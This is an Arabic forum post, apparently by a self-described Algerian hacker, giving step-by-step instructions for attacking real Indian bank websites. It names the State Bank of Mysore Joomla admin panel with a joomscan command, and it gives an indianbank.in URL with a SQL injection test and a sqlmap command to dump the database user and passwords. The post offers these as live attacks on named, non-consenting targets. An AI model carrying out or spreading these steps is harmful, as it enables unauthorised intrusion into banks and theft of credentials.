بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله تعالى و بركاته
الآن كنت ادور في النت لقيت موقع بنك الهند صراحة موقع محمي .. و لغباء البنك
هو على سيرفر عام هههه يمكن إختراقه عادي . . طريقة الإختراق الي معاه الباك
تراك
الآن اقول له .. يدخل [ هنا ] رح يلاقي .. الموقع هاذا .
http://www.statebankofmysore.co.in/i...185&Itemid=233
الموقع هاذا طبعا الكل يعرقه .. جوملا الغني عن التعريف و الكل
يعرف رابط لوحة التحكم ..
http://www.statebankofmysore.co.in/administrator/
المهم الي عليك ترووح للباك تراك توجد اداة joomscan تقدر تعمل تشيك للثغرات
كل ثغرات جوملا .. يعني بلاامر
joomscan.pl -u http://www.statebankofmysore.co.in
إذا غالط صححوا لي .. لاني نسيت الامر
و تخلي الاداة تكمل فحصتها و انت شوف الثغرات المناسبة و الشغالة ..
و الي ما عنده الباك تراك مثلي انا قاعد يتفرج على الويندوز يجرب اي طريقة
لإختراق البنك .. البنك قلت على سيرفر عام يعني فيه 4 مواقع احرى او لم ادقق
منيح المهم رابط الثغرة ..
http://www.indianbank.in/loans.php?by=7
نشوف : http://www.indianbank.in/loans.php?by=7%27
نرى ان الكتابة إختفت دلالة على وجود الثغرة .. صاحب لاباك تراك عبر اداة
sqlmap
يمكن الإتصال بقاعدة البيانات .. عبر الامر ..
sqlmap.py -u http://www.indianbank.in/loans.php?by=7 -v 1 --current-user --passwords
و يخليه و إن شاء الله النتيجة إيجابية .. و الي على الويندوز يجرب على الهافيج انا ما
و مو على جهازي اصلا على جهاز اخي .. جهازي ضاع مسكين .. الله يعين
هاذا الي اقول الآن .. واي استفسار اتفضل بدنا ننقاش الامر ..
اخوكم الهكر الجزائري BrEaKeR-Dz
السلام عليكم
SQLi in BnakIndia by BrEaKeR-Dz hgi;v hg[.hzvd